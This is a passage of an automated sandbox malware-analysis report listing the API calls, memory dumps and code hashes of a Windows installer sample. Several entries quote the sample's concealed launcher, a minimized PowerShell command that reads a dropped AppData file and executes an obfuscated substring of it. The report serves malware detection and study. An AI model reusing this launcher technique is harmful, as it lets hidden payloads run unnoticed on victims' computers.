                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
                                                                                                • WriteFile.KERNELBASE(0040A8A0,0040FD89,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?), ref: 0040313C
                                                                                                • SetFilePointer.KERNELBASE(0014D3D6,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB), ref: 0040318E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Pointer$CountTickWrite
                                                                                                • String ID:
                                                                                                • API String ID: 2146148272-0
                                                                                                • Opcode ID: e969f51fb91c1eed4d8a9bc9024c2eb0b6bf39f0f502a3b67258e99aab1be33f
                                                                                                • Instruction ID: 2060b4db2a59e7e801be0a10e6f45457beaa1fbeaf8038f8ae1418eaad325724
                                                                                                • Opcode Fuzzy Hash: e969f51fb91c1eed4d8a9bc9024c2eb0b6bf39f0f502a3b67258e99aab1be33f
                                                                                                • Instruction Fuzzy Hash: 4B414F725052019FDB10BF29EE849663BFCFB4431A715863BE810BA2E4D7389952CB5E
                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00421500,Error launching installer), ref: 004054C9
                                                                                                • CloseHandle.KERNEL32(?), ref: 004054D6
                                                                                                Strings
                                                                                                • Error launching installer, xrefs: 004054B7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                • String ID: Error launching installer
                                                                                                • API String ID: 3712363035-66219284
                                                                                                • Opcode ID: 034994f398fec6ba88842b1298b049e6f5c009d7984ce4a05d2457150fb2f9bc
                                                                                                • Instruction ID: 1668edf84edc795d90e5179e363d58f44986d7750dcb732495ea53e78f2e035e
                                                                                                • Opcode Fuzzy Hash: 034994f398fec6ba88842b1298b049e6f5c009d7984ce4a05d2457150fb2f9bc
                                                                                                • Instruction Fuzzy Hash: 8AE0E674A00209BBDB109FA4DD05A6B77BCEB14345B508561B911E2160E774D9548A79
                                                                                                APIs
                                                                                                  • Part of subcall function 00405F5C: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ulf4JrCRk2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FB4
                                                                                                  • Part of subcall function 00405F5C: CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
                                                                                                  • Part of subcall function 00405F5C: CharNextA.USER32(?,"C:\Users\user\Desktop\ulf4JrCRk2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FC6
                                                                                                  • Part of subcall function 00405F5C: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FD6
                                                                                                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00403204
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 4115351271-3283962145
                                                                                                • Opcode ID: 19db8b8bfed8fece06fc430a338c59f426dc89455e02ba762a85112f258f8684
                                                                                                • Instruction ID: 49f334a6ee715e6e2f1f3bf4cc11e7508e43270cc78003a87510b5ca2b0d9132
                                                                                                • Opcode Fuzzy Hash: 19db8b8bfed8fece06fc430a338c59f426dc89455e02ba762a85112f258f8684
                                                                                                • Instruction Fuzzy Hash: 4CD0C71154AD3066D55137263D46FCF050C8F46719F514077FD04751C29B6C594365EF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 02ed812fe0e611b0f2998a09c2da57c3139bdc2a01b144affc629b665b317990
                                                                                                • Instruction ID: cc181508766c158152089796d80991778684c5c1c63ccc40f22f1fdcfebbd241
                                                                                                • Opcode Fuzzy Hash: 02ed812fe0e611b0f2998a09c2da57c3139bdc2a01b144affc629b665b317990
                                                                                                • Instruction Fuzzy Hash: C8A13371E00228CBDF28CFA8C8547ADBBB1FB44305F15816EE816BB281D7785A96DF44
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 214f48695c7995470a7a0fcbeb3eca81d4e2424ba51fdacd53dd0d027dd6a452
                                                                                                • Instruction ID: 3fc28d3a08aea7e3d86c5d24e10e7686d7df8f1296a80a0676572424d41607f7
                                                                                                • Opcode Fuzzy Hash: 214f48695c7995470a7a0fcbeb3eca81d4e2424ba51fdacd53dd0d027dd6a452
                                                                                                • Instruction Fuzzy Hash: FF912370E00228CBDF28CF98C8547ADBBB1FB45305F15816ED816BB291D7785A96DF44
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: aafcf2097c1515207922f326c8ed1c2e4537c5f7359ba1e2f684dafb2374b94b
                                                                                                • Instruction ID: dd30d2edeb09ef8142f3126e4ca7f9bb6d977725bfad211a31da1ac854ab15b9
                                                                                                • Opcode Fuzzy Hash: aafcf2097c1515207922f326c8ed1c2e4537c5f7359ba1e2f684dafb2374b94b
                                                                                                • Instruction Fuzzy Hash: 29814771E00228CFDF24CFA8C8447ADBBB1FB44305F25816AD416BB281D7389A96DF05
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 439609ef046878b9c851ba854847407a98b524300d750c8d5ff49980f3ce6887
                                                                                                • Instruction ID: 9c7bf14ce72a16f54db54216be52a61449617ebae17e1f3f959b8044aea663dd
                                                                                                • Opcode Fuzzy Hash: 439609ef046878b9c851ba854847407a98b524300d750c8d5ff49980f3ce6887
                                                                                                • Instruction Fuzzy Hash: 42816771D00228CBDF24CFA8C8447ADBBB1FB44305F11816EE856BB281D7786A96DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5ca8852c6a58b64f8378a0d1c7197c8df105657e20cc6a0d4183a5da649b504f
                                                                                                • Instruction ID: 46e89f5986d2092b55afe70fa6685d9fa399791e8108fb818b391c00f2395523
                                                                                                • Opcode Fuzzy Hash: 5ca8852c6a58b64f8378a0d1c7197c8df105657e20cc6a0d4183a5da649b504f
                                                                                                • Instruction Fuzzy Hash: DB7134B1D00228CFDF24CFA8C9547ADBBB1FB48305F15816AE816BB281D7385A96DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7b7285504dc25ebea62f348072f1f3953958a79e977259425cfc79aacb6983c9
                                                                                                • Instruction ID: 5e67b4a66f05046138c2ae5a0676b57ce30197662a7df0c6b5261f8fe412ade3
                                                                                                • Opcode Fuzzy Hash: 7b7285504dc25ebea62f348072f1f3953958a79e977259425cfc79aacb6983c9
                                                                                                • Instruction Fuzzy Hash: 22713471E00228CBDF28CFA8C854BADBBB1FB44305F15816ED816BB291D7385A96DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7c3b74398c38f172e1519338bca71769cfe788df72e053bc328fcfef0089e390
                                                                                                • Instruction ID: 362732d661397dfbd4d13a455e5b242d3c248a06ae4e9e58d05d54b49be68c20
                                                                                                • Opcode Fuzzy Hash: 7c3b74398c38f172e1519338bca71769cfe788df72e053bc328fcfef0089e390
                                                                                                • Instruction Fuzzy Hash: E7714671E00228CBDF28CF98C854BADBBB1FB44305F15816EE816BB291D7386A56DF45
                                                                                                APIs
                                                                                                • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
                                                                                                • WriteFile.KERNELBASE(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,00000004,00000004,00000000,00000000,?,?), ref: 00402FD2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$PointerWrite
                                                                                                • String ID:
                                                                                                • API String ID: 539440098-0
                                                                                                • Opcode ID: b34524b006225fd86995ffc18ec7893ffd6bb3b8ae62ae05747d43261111392a
                                                                                                • Instruction ID: 299fc1a8812a7dc38163d95f9210b7a7d751e7dd8a0fa05609209fb9265a90e4
                                                                                                • Opcode Fuzzy Hash: b34524b006225fd86995ffc18ec7893ffd6bb3b8ae62ae05747d43261111392a
                                                                                                • Instruction Fuzzy Hash: B2314871502259EFDF20DF59DE44A9E3BA8EF043A5F20403AF908E61D0D374DA41EBA9
                                                                                                APIs
                                                                                                  • Part of subcall function 00404FDC: lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
                                                                                                  • Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
                                                                                                  • Part of subcall function 00404FDC: lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000), ref: 00405038
                                                                                                  • Part of subcall function 00404FDC: SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "), ref: 0040504A
                                                                                                  • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                                                                  • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                                                                  • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                                                                  • Part of subcall function 004054A4: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00421500,Error launching installer), ref: 004054C9
                                                                                                  • Part of subcall function 004054A4: CloseHandle.KERNEL32(?), ref: 004054D6
                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 3521207402-0
                                                                                                • Opcode ID: 6a5de7a37bb700338687ddac31e5bfd3191d7f94f57ef416233b19e3b48e67ff
                                                                                                • Instruction ID: 0e472d9888b0de42699340f3058b26b535eb6e7fa7af9e3b9e30c9644b91f742
                                                                                                • Opcode Fuzzy Hash: 6a5de7a37bb700338687ddac31e5bfd3191d7f94f57ef416233b19e3b48e67ff
                                                                                                • Instruction Fuzzy Hash: 92016D31904114FBCF11AFA1CD459AE7B71EB00345F10847BEA01B51E1C3784A81EBAA
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,00405E1D,00000000,00000002,?,00000002,?,?,00405E1D,80000002,Software\Microsoft\Windows\CurrentVersion,?,004226A0,?), ref: 00405C01
                                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00405E1D,?,00405E1D), ref: 00405C22
                                                                                                • RegCloseKey.KERNELBASE(?), ref: 00405C43
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
